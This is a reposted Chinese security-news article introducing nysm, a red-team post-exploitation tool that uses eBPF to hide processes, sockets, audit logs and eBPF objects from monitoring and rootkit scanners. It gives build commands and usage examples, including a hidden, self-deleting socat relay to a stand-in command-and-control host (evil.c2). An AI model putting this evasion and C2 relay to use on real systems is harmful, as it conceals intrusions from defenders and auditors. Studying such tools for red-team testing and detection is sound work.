nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

admin 2024年3月25日21:34:52评论10 views字数 1006阅读3分21秒阅读模式
关于nysm

nysm是一款针对红队审计的隐蔽型后渗透安全测试容器,该工具主要针对的是eBPF,能够帮助广大红队研究人员在后渗透测试场景下保持eBPF的隐蔽性。

nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

功能特性

随着基于eBPF的安全工具越来越受社区欢迎,nysm也应运而生。该工具能保持各种安全测试工具的隐蔽性,当前版本的nysm支持隐藏下列内容:

1、新的eBPF程序;

2、新的eBPF Map;

3、新的eBPF链接;

4、新的审计生成日志;

5、新的进程PID;

6、新的会话套接字;

除了隐藏eBPF之外,当前版本的nysm还支持隐藏下列工具组件:

bpftool

bpflist-bpfcc

ps

top

sockstat

rkhunter

chkrootkit

lsof

auditd

...

工具安装

源码获取:

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/eeriedusk/nysm.git

工具依赖组件安装:

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux Header配置:

cd ./nysm/src/bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

代码构建:

cd ./nysm/src/make
工具使用

nysm的使用非常简单,并提供了下列参数命令:

Usage: nysm [OPTION...] COMMANDStealth eBPF container.  -d, --detach               在后台运行命令  -r, --rm                   执行后执行自毁程序  -v, --verbose              生成Verbose模式输出  -h, --help                  显示工具帮助信息      --usage                显示工具使用提示消息
工具使用样例

运行一个隐藏的Bash:

./nysm bash

运行一个隐藏的ssh并移除./nysm:

./nysm -r ssh user@domain

以守护进程形式运行一个隐藏的socat并移除./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
许可证协议

本项目的开发与发布遵循Apache-2.0开源许可证协议。

项目地址

nysm:

https://github.com/eeriedusk/nysm

原文始发于微信公众号(FreeBuf):nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月25日21:34:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nysm:一款针对红队审计的隐蔽型后渗透安全测试容器https://cn-sec.com/archives/2602468.html

发表评论

匿名网友 填写信息